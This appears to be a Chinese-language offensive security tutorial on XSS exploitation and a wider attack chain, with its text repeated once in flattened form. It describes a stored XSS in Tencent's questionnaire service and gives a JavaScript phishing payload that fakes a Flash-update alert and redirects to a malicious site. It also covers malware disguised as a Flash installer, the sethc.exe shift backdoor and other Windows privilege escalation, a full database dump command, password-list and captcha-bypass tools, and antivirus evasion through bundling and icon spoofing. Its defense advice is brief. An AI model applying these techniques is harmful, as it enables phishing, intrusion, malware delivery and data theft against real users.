月饼计划之XSS
字数 1420 2025-08-12 11:34:09

XSS漏洞挖掘与利用实战教学文档

一、XSS漏洞基础知识

XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web安全漏洞,攻击者能够在受害者的浏览器中执行恶意脚本。

XSS类型

  1. 反射型XSS:恶意脚本来自当前HTTP请求
  2. 存储型XSS:恶意脚本被存储到服务器上
  3. DOM型XSS:通过修改DOM环境而非插入HTML代码实现

基本Payload

<script>alert(1)</script>

二、XSS漏洞挖掘实战

案例1:腾讯问卷存储型XSS

  1. 发现过程

    • 访问问卷填写页面(https://wj.qq.com/)
    • 在用户输入字段尝试插入XSS payload
    • 提交后重新访问,发现payload被存储并执行
  2. 验证方法

    • 创建新问卷
    • 在"其他内容"字段插入payload
    • 查看回收数据时触发XSS
  3. 技术要点

    • 存储型XSS需要验证数据是否持久化存储
    • 后台查看数据时可能触发XSS

案例2:后台系统XSS钓鱼

  1. 攻击流程

    • 获取后台系统控制权
    • 在登录页面插入XSS代码
    • 等待管理员访问触发
  2. XSS钓鱼代码示例

window.alert = function(name){
  var iframe = document.createElement("IFRAME");
  iframe.style.display="none";
  iframe.setAttribute("src",'data:text/plain,');
  document.documentElement.appendChild(iframe);
  window.frames[0].window.alert(name);
  iframe.parentNode.removeChild(iframe);
}
alert("您的FLASH版本过低,尝试升级后访问该页面!");
window.location.href="http://恶意网站/";
  1. 钓鱼页面制作
    • 使用Fake-flash模板(https://github.com/r00tSe7en/Fake-flash.cn)
    • 修改下载地址为恶意程序
    • 使用ResourceHacker修改程序图标增加可信度

三、辅助技术

1. SSL Pinning绕过

  • 工具:Xposed + JustTrustMe模块
  • 原理:Hook证书校验API,强制返回验证通过

2. 密码爆破

  • 社工字典生成工具:cupp.py
git clone https://github.com/Mebus/cupp.git
python3 cupp.py -i  # 交互模式

3. 验证码绕过

  • 工具:captcha-killer
  • 配置百度OCR API key
  • 参考文档:https://gv7.me/articles/2019/burp-captcha-killer-usage/

4. 提权技术

  • Windows提权方法:
    • 查找系统漏洞:windows-exploit-suggester.py
    • 第三方服务提权(如FileZilla)
    • shift后门:替换sethc.exe为cmd.exe
    • 启动项后门
    • mof提权

5. 数据库导出

mysqldump -uroot -p密码 --all-databases > dump.sql

四、免杀技术

  1. 多语言转换:如PHP马转EXE
  2. 自解压捆绑
    • 将恶意程序与正常程序捆绑
    • 设置静默安装和覆盖选项
  3. 图标修改:使用ResourceHacker替换为可信程序图标
  4. 开源工具:如掩日(可过部分杀软)

五、攻击链构建

  1. 信息收集 → 2. 漏洞发现 → 3. 初始访问 → 4. 权限提升 → 5. 横向移动 → 6. 数据收集 → 7. 攻击维持 → 8. 痕迹清理

六、防御建议

  1. 输入过滤:对所有用户输入进行严格过滤
  2. 输出编码:在输出到页面时进行HTML编码
  3. CSP策略:实施内容安全策略
  4. HttpOnly标志:为cookie设置HttpOnly
  5. XSS防护库:使用DOMPurify等库净化HTML
  6. 定期审计:对系统进行安全审计和渗透测试

七、工具清单

  1. Burp Suite
  2. Xposed + JustTrustMe
  3. captcha-killer
  4. windows-exploit-suggester
  5. FileZilla客户端
  6. ResourceHacker
  7. Fake-flash钓鱼模板
  8. cupp社工字典生成器

通过本教学文档,您应该掌握了从基础XSS发现到复杂攻击链构建的全过程技术要点。请仅将这些技术用于合法授权的安全测试和防御研究。

XSS漏洞挖掘与利用实战教学文档 一、XSS漏洞基础知识 XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web安全漏洞,攻击者能够在受害者的浏览器中执行恶意脚本。 XSS类型 反射型XSS :恶意脚本来自当前HTTP请求 存储型XSS :恶意脚本被存储到服务器上 DOM型XSS :通过修改DOM环境而非插入HTML代码实现 基本Payload 二、XSS漏洞挖掘实战 案例1:腾讯问卷存储型XSS 发现过程 : 访问问卷填写页面(https://wj.qq.com/) 在用户输入字段尝试插入XSS payload 提交后重新访问,发现payload被存储并执行 验证方法 : 创建新问卷 在"其他内容"字段插入payload 查看回收数据时触发XSS 技术要点 : 存储型XSS需要验证数据是否持久化存储 后台查看数据时可能触发XSS 案例2:后台系统XSS钓鱼 攻击流程 : 获取后台系统控制权 在登录页面插入XSS代码 等待管理员访问触发 XSS钓鱼代码示例 : 钓鱼页面制作 : 使用Fake-flash模板(https://github.com/r00tSe7en/Fake-flash.cn) 修改下载地址为恶意程序 使用ResourceHacker修改程序图标增加可信度 三、辅助技术 1. SSL Pinning绕过 工具:Xposed + JustTrustMe模块 原理:Hook证书校验API,强制返回验证通过 2. 密码爆破 社工字典生成工具:cupp.py 3. 验证码绕过 工具:captcha-killer 配置百度OCR API key 参考文档:https://gv7.me/articles/2019/burp-captcha-killer-usage/ 4. 提权技术 Windows提权方法: 查找系统漏洞:windows-exploit-suggester.py 第三方服务提权(如FileZilla) shift后门:替换sethc.exe为cmd.exe 启动项后门 mof提权 5. 数据库导出 四、免杀技术 多语言转换 :如PHP马转EXE 自解压捆绑 : 将恶意程序与正常程序捆绑 设置静默安装和覆盖选项 图标修改 :使用ResourceHacker替换为可信程序图标 开源工具 :如掩日(可过部分杀软) 五、攻击链构建 信息收集 → 2. 漏洞发现 → 3. 初始访问 → 4. 权限提升 → 5. 横向移动 → 6. 数据收集 → 7. 攻击维持 → 8. 痕迹清理 六、防御建议 输入过滤 :对所有用户输入进行严格过滤 输出编码 :在输出到页面时进行HTML编码 CSP策略 :实施内容安全策略 HttpOnly标志 :为cookie设置HttpOnly XSS防护库 :使用DOMPurify等库净化HTML 定期审计 :对系统进行安全审计和渗透测试 七、工具清单 Burp Suite Xposed + JustTrustMe captcha-killer windows-exploit-suggester FileZilla客户端 ResourceHacker Fake-flash钓鱼模板 cupp社工字典生成器 通过本教学文档,您应该掌握了从基础XSS发现到复杂攻击链构建的全过程技术要点。请仅将这些技术用于合法授权的安全测试和防御研究。